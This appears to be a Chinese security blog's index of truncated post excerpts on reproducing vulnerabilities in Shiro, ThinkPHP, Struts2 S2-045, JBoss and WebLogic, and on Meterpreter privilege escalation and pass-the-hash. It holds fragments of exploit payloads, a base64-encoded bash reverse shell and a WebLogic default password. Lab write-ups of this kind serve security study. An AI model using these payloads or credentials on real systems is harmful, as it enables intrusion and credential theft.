Shiro漏洞整理 Shiro-5500x00 发现漏洞 发现shiro 登录页面 0x01 尝试利用 使用ysoserial.jar 1java -cp ysoserial.jar ysoserial.exploit.JRMPListener 10998 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTI 2024-02-13 #整理
渗透测试框架提权 msfmetepreter 提权在有一个Session的条件之下,直接使用getsystem自动提权 发现成功提权 返回之前的权限 获取hash值是可以使用管理员权限,但是如果想要获取明文密码就需要获取system权限了 如果是高版本的windwos 就会发现提权不了 尝试了解getsystem的原理是什么 如果发现操作失败,可以通过获取当前session 能使用什么方式进行提权(local 2024-02-13 #渗透
Thinkphp漏洞整理 漏洞复现Thinkphp5.0.20_RCE0x00 随便访问一个路径,然后获取报错信息 5.0.* 版本 thinkphp相关工具扫描结果发现路由过滤不严谨 那就直接使用payload 尝试 1/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put 2024-02-12 #整理
操作系统提权 简介不建议自动化提权,可能对主机造成很严重的问题 目的对于提权的目的,由于有些情况之下我们需要做某些一些操作的时候没有权限,我们只能使用提权的方式进行权限提升,以此来完成我们的操作 概述windwos 中常见的权限 用户权限( users ) 管理员权限( administrator ) 系统权限( system ) 访客权限( guest ) windows 提权 user –> 2024-02-12 #渗透
S2-045这个是一个rce 漏洞 0x00 这是一个模拟的上传文件的一个页面 尝试上传文件,然后抓包 修改content-type 1Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(# 2024-02-10
域横向移动 PTH简介PASS THE Hash 也叫 Hash 传递攻击,简称 PTH。模拟用户登录不需要用户明文密码,就可以直接 用获取到的 Hash 来登录目标系统。 利用成功的前提条件是: 开启 445 端口 SMB 服务 开启 admin$ 共享 Metasploit psexec模块通过获取的Meterpreter会话执行hashdump得到用户hash值 1hashdump 2024-02-10 #渗透
jboss漏洞整理 jboss 漏洞复现jmx-console 发现后台就直接访问后后台,然后尝试部署war包 利用成功 jboss-WeakPasswd尝试访问console 的时候发现 尝试 admin/admin 之后的操作就和上面的一样了 CVE-2007-10360x00 漏洞简介 此漏洞主要是由于JBoss中 /jmx-console/HtmlAdapt 2024-02-09 #整理
NVD-C-2019-48814 漏洞简介WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 WebLogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。是商业市场上主要的Java(J2EE)应用 2024-02-09 #漏洞复现
weblogic漏洞复现 Weblogic-WeakPasswd0x00 发现一个weblogic 搜索weblogic后台,直接查看console 然后发现这个,尝试默认的密码 https://cirt.net/passwords?criteria=weblogic 发现密码是 账号:weblogic 密码:Oracle@123 0x01 部署jar包 上传成功 0x02 连接蚁剑 CVE-20 2024-02-08 #整理